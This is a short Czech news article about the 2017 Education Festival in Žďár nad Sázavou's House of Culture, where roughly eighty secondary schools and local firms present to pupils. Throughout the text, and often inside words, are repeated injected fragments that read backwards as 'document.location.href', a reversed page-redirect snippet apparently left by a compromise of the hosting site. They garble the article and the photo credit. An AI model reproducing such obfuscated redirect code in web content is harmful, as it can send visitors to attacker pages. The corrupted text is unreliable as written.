Rainbow page separator

Na Festivalu vzdělávání se dětem představí na osmdesát škol

Neděle, 5. listopadu 2017

Žďár nad Sázavou / Už podvaadvacáté se ve čtvrtek 9. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu v době od 8 do 17 hodin ve žďárském Domě kultury uskuteční přehlídka středních škol s názvem Festival vzdělávání. Na ten již tradičně přijíždějí především žáci 7. až 9. tříd základních škol, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nejenom ze žďárského okresu, které čeká rozhodování o jejich budoucím povolání.
Vedle téměř osmi desítek středních škol a učilišť se na festivalu budou rovněž prezen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat žďárské firmy. Jejich stánky le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos zájemci najdou na jevišti sálu Domu kultury.
„Školy se prezentují nejenom podle svého hlavního zaměření, ale v posledních letech se snaží budoucí studenty oslovit i doprovodným programem. Žďárský festival patří svojí nabídkou k největším v republice,“ vyjádřila se ředitelka příspěvkové organizace města Kultura Žďár, která Festival vzdělávání každoročně pořádá, Marcela Lorencová.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tohalama/“ target=“_blank“ rel=“noopener noreferrer“>Martin Halama